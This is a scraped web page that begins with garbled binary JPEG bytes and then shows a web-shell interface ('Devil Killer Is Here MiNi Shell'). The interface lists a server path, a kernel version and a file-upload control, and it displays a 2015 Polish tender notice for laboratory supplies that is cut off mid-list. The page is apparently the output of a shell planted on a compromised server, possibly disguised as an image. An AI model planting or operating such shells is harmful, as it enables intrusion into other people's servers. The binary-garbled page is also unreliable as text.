JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20151223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20151223/352078-N-2015.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu laboratoryjnego określonego w 4 pakietach</b><br>
<b>Numer ogłoszenia: 352078 - 2015; data zamieszczenia: 23.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Gruźlicy i Chorób Płuc , ul.  Płocka 26, 01-138 Warszawa, woj. mazowieckie, tel. 022 4312128, faks 022 4312452.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igichp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu laboratoryjnego określonego w 4 pakietach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu laboratoryjnego określonego w 4 pakietach:
Pakiet Nr 1:	Pojemnik na plwocinę - 4 000 szt., Pojemniki uniwersalne - 4 000 szt., Pojemniki na odpady medyczne o poj. 1,0 l - 2 000 szt., Pojemniki na odpady medyczne poj. 3,0 l - 3 000 szt., Pojemniki na odpady medyczne poj. 5,0 l - 1 000 szt., Pojemniki na odpady medyczne poj. 10,0 l - 200 szt., Pojemniki na odpady medyczne o poj. 60l. - 400 szt., Pojemniki na mocz z nakrętką poj. 100-120 ml jałowy - 40 000 szt., Pojemnik na mocz z poj. 50-60 ml, niejałowy - 30 000 szt., Pojemnik z PS histopatologiczny poj. 30 ml - 20 000 szt., Pojemniki na wodę poj.10l. - 8 szt., Pojemniki do przechowywania formaliny poj. 20,0 l - 4 szt., Probówki PP o poj. 7 ml - 5 000 szt., Probówki okrągłodenne poj.10- 11 ml - 1 500 szt., Korki do probówek - 1 500 szt., Szpatułki laryngologiczne - 10 000 szt., Kamery do analizy osadu moczu - 500 szt., Końcówki 1000 mikrol. z filtrem - 30 000 szt., Końcówki 0,5-10 mikrol. z filtrem - 30 000 szt., Końcówki 10-100 mikrol. z iltrem - 30 000 szt., Końcówki 10-200 mikrol. z filtrem - 30 000 szt., Końcówka 5000 ul - 3 000 szt., Końcówki do pipet - 3 000 szt., Worki foliowe o wymiarach 600x800x0,05 mm - 2 000 szt., Torebki foliowe o wymiarach 150 mm x200 mm x0,04 mm - 30 000 szt., Torebki foliowe o wymiarach 100 mm x150 mm x 0,04 mm - 30 000 szt., Torebki foliowe o wymiarach 200mm x300 mm x0,04 mmm - 30 000 szt., Torebki foliowe o wymiarach 350 mmx450 mm x0,04 mm - 30 000 szt., Worki foliowe wym. 600 mm x 800 mmx 0.04 mm wykonane z folli PP do usuwania odpadów laboratoryjnych - 2 000 szt., Probówka PS 16x100 mm stożkowa - 5 000 szt., Końcówki do pipet typu Eppendorf o poj. 2 -200 ul - 200 000 szt., Końcówki do pipet typu Gilson o poj. 2 -200 ul, żółte - 10 000 szt., Końcówki do pipet typu Eppendorf o poj. 1000 ul, niebieskie - 80 000 szt., Probówka PS okrągłodenna o poj. 4 ml - 50 000 szt., Korek do probówki 4ml - 10 000 szt., Płytka Petriego średn. 90 mm - 8 000 szt., Końcówki do pipet automatycznych typu Gilson poj. 5 ml - 1 000 szt., Pipeta nastawna jednokanałowa 100-1000 mikrol. - 10 szt., Pipeta nastawna jednokanałowa 10-100 mikrol. - 6 szt., Pipeta nastawna jednokanałowa 20-200 mikrol. - 4 szt., Kieliszki jednorazowe do leków poj. 30 ml - 500000 szt., Fartuch foliowy jednorazowy - 80000 szt., Ezy polisterynowe z oczkiem 10 mikrol - 30000 szt., Ezy polisterynowe z oczkiem 1 mikrol - 30000 szt., Statyw na probówki o średnicy 30 mm 24 miejscowy - 8 szt., Statyw na probówki wirówkowe typu eppendorfa 1,5 ml - 8 szt., Pojemnik do dobowej zbiórki moczu tulipan pojemność całkowita 3 l - 600 szt., Płytka Petriego średn. 80 mm - 2000 szt., Probówki okrągłodenne z PP - 10000 szt., Mikrokońcówki do Finpipety 0,2-10 mikrol. - 4000 szt., Szkiełka mikroskopowe pokryte polilizyną 25x75x1 mm - 7920 szt., Końcówki do pipet Branda poj. 100-1000 mikrol. - 4000 szt., Końcówki do pipet Brandta poj 100-1000 mikrol. z filtrem - 5000 szt., Końcówki do pipet Brandta poj.10-100 mikrol. z filtrem - 9984 szt., Końcówki do pipety Brandta poj. 10-200 mikrol. - 10000 szt., Końcówki do pipety Brandta poj. 30-300 mikrol. - 384 szt., Końcówki po pipet Brandta poj. 30-300 mikrol. - 6000 szt., Końcówki do pipet Brandta poj. 0,5-10 mikrol. z filtrem - 384 szt., Końcówki do pipet Brandta poj. 0,1-10 mikrol. z filtrem - 384 szt., Końcówki do pipet Brandta poj.0,1-10 mikrol. - 4000 szt., Końcówki do pipet Brandta poj. 1-200 mikrol - 4000 szt., Końcówki do pipet Brandta poj. 2-20 mikrol. z filtrem - 4992 szt., Sitka do komórek, trzy siateczki nylonowe śr. oczek 100 ul - 2000 szt., Kriobanki- zestaw fiolek z kulkami ceramicznymi w opakowaniu 81-szt. - 25 op., Zlewka porcelanowa o poj. 250 ml - 8 szt., Zlewka porcelanowa o poj. 500 ml - 8 szt., Zlewka porcelanowa o poj. 1000 ml - 8 szt., Płytka Petriego średn. 60 mm, wys.14 mm - 1500 szt., Płytka Petriego średn. 140mm, wys. 14mm - 2500 szt., Probówki poj. 4 ml (12 x 75 mm) sterylne - 5000 szt., Probówki poj. 10ml (16x100 mm) sterylne - 5000 szt., Czasomierz/stoper laboratoryjny - 5 szt., Statyw obrotowy, 8 miejscowy do pipet 1, 8, 12 kanałowych - 2 szt., Pudełko na 25 preparatów mikroskopowych - 2 szt., Pudełko z ABS na 10 preparatów mikroskopowych - 1 szt., Statyw na 40 probówek o średnicy 16-20 mm - 4 szt., Statyw na 10 probówek o średnicy 18 mm - 2 szt., Statyw na 10 probówek o średnicy 16 mm - 4 szt., Penseta z metalu - 4 szt., Penseta z metalu o ostrych, wygiętych końcach o długości 130 mm - 3 szt., Penseta z metalu o tępych końcach o długości 130 mm - 2 szt., Pojemniki do dobowej zbiórki moczu poj. 2-2,5l - 2000 szt. Butelki z PP pojemność 250 ml - 20 szt., Butelki z PP pojemność 100 ml - 5 szt., Probówki wirówkowe szklane 25 ml. - 200 szt., Probówki wirówkowe szklane, poj. 50 ml. - 200 szt., Probówki okrągłodenne, szkło borokszemianowe, zakręcane nakrętką, poj. 50ml - 200 szt., Kulki szklane, średnica 1,5-2 mm - 2 kg., Kolby stożkowe szklane poj. 500 ml - 50 szt., Cylindry szklane poj.100 ml - 5 szt., Cylindry szklane poj. 25ml - 5 szt., Cylindry szklane poj. 50ml - 50 szt., Koperty ochronne C13 na 4 szkiełka - 460 szt., Lejki szklane średnica 16 cm - 5 szt., Pudełka do szkiełek mikroskopowych - 260 szt., Kolby kuliste poj. 4l - 20 szt., Probówki wirówkowe typu Eppendorfa o pojemności 1,5 ml - 30000 szt., Probówki wirówkowe typu Eppendorfa o pojemności 0,5 ml - 30000 szt., Probówka 0,2 ml do PCR - 5000 szt.
Pakiet Nr 2:	Mikro płytki reakcyjne - płytki z 96 dołkami o pojemności 0,2 ml - 8 op., Nakrywki do płytek z poz. 1 - 4 op.
Pakiet Nr 3:	Pojemnik o pojemności 0,7-0,8 litra owalny - 3000 szt., Pojemnik o pojemności 0,7-0,8 litra o podstawie okręgu - 3000 szt., Pojemnik o pojemności 1,0-litra - 8000szt., Pojemnik o pojemności 1,0-litra - 16000 szt., Pojemnik o pojemności 2,5- 2,6 litra - 1500 szt., Pojemnik o pojemności 3,0 - 3,5 litra - 3000 szt.
Pakiet Nr 4:	Kasetki histopatologiczne - 60 000 szt., Kasetki histopatologiczne - 40 000 szt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 33.79.30.00-5, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty, w formie oryginału lub notarialnie poświadczonej kopii, potwierdzające uprawnienie osób do podpisania oferty i innych dokumentów, o ile nie wynikają z przepisów prawa lub innych dołączonych do oferty dokumentów rejestrowych. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie - złożone nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy. - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Cena może ulec zmianie podczas obowiązywania niniejszej umowy jedynie w przypadku zmiany stawki podatku VAT. W takim przypadku cena zostanie ustalona z zastosowaniem nowej stawki VAT. W przypadku zaistnienia okoliczności opisanych w art. 142 ust. 5 pkt 2 i 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.) Wykonawca oświadcza, że skutki finansowe tych zmian nie będą miały w ogóle, albo będą miały minimalny wpływ na koszty wykonania zamówienia przez niego, a tym samym skutki z tego wynikające Wykonawca poniesie we własnym zakresie. Zamawiający zastrzega sobie prawo nie złożenia zamówienia na cały przedmiot umowy, nie więcej jednak niż 20% łącznej ilości sztuk, na co Wykonawca wyraża zgodę. Wykonawca ponadto oświadcza, że z tego tytułu nie będzie zgłaszał wobec Zamawiającego jakichkolwiek roszczeń.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igichp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Gruźlicy i Chorób Płuc, ul. Płocka 26, 01-138 Warszawa, budynek E, lok. 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2016 godzina 09:00, miejsce: Instytut Gruźlicy i Chorób Płuc, ul. Płocka 26, 01-138 Warszawa, budynek E, lok. 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 1:	Pojemnik na plwocinę - 4 000 szt., Pojemniki uniwersalne - 4 000 szt., Pojemniki na odpady medyczne o poj. 1,0 l - 2 000 szt., Pojemniki na odpady medyczne poj. 3,0 l - 3 000 szt., Pojemniki na odpady medyczne poj. 5,0 l - 1 000 szt., Pojemniki na odpady medyczne poj. 10,0 l - 200 szt., Pojemniki na odpady medyczne o poj. 60l. - 400 szt., Pojemniki na mocz z nakrętką poj. 100-120 ml jałowy - 40 000 szt., Pojemnik na mocz z poj. 50-60 ml, niejałowy - 30 000 szt., Pojemnik z PS histopatologiczny poj. 30 ml - 20 000 szt., Pojemniki na wodę poj.10l. - 8 szt., Pojemniki do przechowywania formaliny poj. 20,0 l - 4 szt., Probówki PP o poj. 7 ml - 5 000 szt., Probówki okrągłodenne poj.10- 11 ml - 1 500 szt., Korki do probówek - 1 500 szt., Szpatułki laryngologiczne - 10 000 szt., Kamery do analizy osadu moczu - 500 szt., Końcówki 1000 mikrol. z filtrem - 30 000 szt., Końcówki 0,5-10 mikrol. z filtrem - 30 000 szt., Końcówki 10-100 mikrol. z iltrem - 30 000 szt., Końcówki 10-200 mikrol. z filtrem - 30 000 szt., Końcówka 5000 ul - 3 000 szt., Końcówki do pipet - 3 000 szt., Worki foliowe o wymiarach 600x800x0,05 mm - 2 000 szt., Torebki foliowe o wymiarach 150 mm x200 mm x0,04 mm - 30 000 szt., Torebki foliowe o wymiarach 100 mm x150 mm x 0,04 mm - 30 000 szt., Torebki foliowe o wymiarach 200mm x300 mm x0,04 mmm - 30 000 szt., Torebki foliowe o wymiarach 350 mmx450 mm x0,04 mm - 30 000 szt., Worki foliowe wym. 600 mm x 800 mmx 0.04 mm wykonane z folli PP do usuwania odpadów laboratoryjnych - 2 000 szt., Probówka PS 16x100 mm stożkowa - 5 000 szt., Końcówki do pipet typu Eppendorf o poj. 2 -200 ul - 200 000 szt., Końcówki do pipet typu Gilson o poj. 2 -200 ul, żółte - 10 000 szt., Końcówki do pipet typu Eppendorf o poj. 1000 ul, niebieskie - 80 000 szt., Probówka PS okrągłodenna o poj. 4 ml - 50 000 szt., Korek do probówki 4ml - 10 000 szt., Płytka Petriego średn. 90 mm - 8 000 szt., Końcówki do pipet automatycznych typu Gilson poj. 5 ml - 1 000 szt., Pipeta nastawna jednokanałowa 100-1000 mikrol. - 10 szt., Pipeta nastawna jednokanałowa 10-100 mikrol. - 6 szt., Pipeta nastawna jednokanałowa 20-200 mikrol. - 4 szt., Kieliszki jednorazowe do leków poj. 30 ml - 500000 szt., Fartuch foliowy jednorazowy - 80000 szt., Ezy polisterynowe z oczkiem 10 mikrol - 30000 szt., Ezy polisterynowe z oczkiem 1 mikrol - 30000 szt., Statyw na probówki o średnicy 30 mm 24 miejscowy - 8 szt., Statyw na probówki wirówkowe typu eppendorfa 1,5 ml - 8 szt., Pojemnik do dobowej zbiórki moczu tulipan pojemność całkowita 3 l - 600 szt., Płytka Petriego średn. 80 mm - 2000 szt., Probówki okrągłodenne z PP - 10000 szt., Mikrokońcówki do Finpipety 0,2-10 mikrol. - 4000 szt., Szkiełka mikroskopowe pokryte polilizyną 25x75x1 mm - 7920 szt., Końcówki do pipet Branda poj. 100-1000 mikrol. - 4000 szt., Końcówki do pipet Brandta poj 100-1000 mikrol. z filtrem - 5000 szt., Końcówki do pipet Brandta poj.10-100 mikrol. z filtrem - 9984 szt., Końcówki do pipety Brandta poj. 10-200 mikrol. - 10000 szt., Końcówki do pipety Brandta poj. 30-300 mikrol. - 384 szt., Końcówki po pipet Brandta poj. 30-300 mikrol. - 6000 szt., Końcówki do pipet Brandta poj. 0,5-10 mikrol. z filtrem - 384 szt., Końcówki do pipet Brandta poj. 0,1-10 mikrol. z filtrem - 384 szt., Końcówki do pipet Brandta poj.0,1-10 mikrol. - 4000 szt., Końcówki do pipet Brandta poj. 1-200 mikrol - 4000 szt., Końcówki do pipet Brandta poj. 2-20 mikrol. z filtrem - 4992 szt., Sitka do komórek, trzy siateczki nylonowe śr. oczek 100 ul - 2000 szt., Kriobanki- zestaw fiolek z kulkami ceramicznymi w opakowaniu 81-szt. - 25 op., Zlewka porcelanowa o poj. 250 ml - 8 szt., Zlewka porcelanowa o poj. 500 ml - 8 szt., Zlewka porcelanowa o poj. 1000 ml - 8 szt., Płytka Petriego średn. 60 mm, wys.14 mm - 1500 szt., Płytka Petriego średn. 140mm, wys. 14mm - 2500 szt., Probówki poj. 4 ml (12 x 75 mm) sterylne - 5000 szt., Probówki poj. 10ml (16x100 mm) 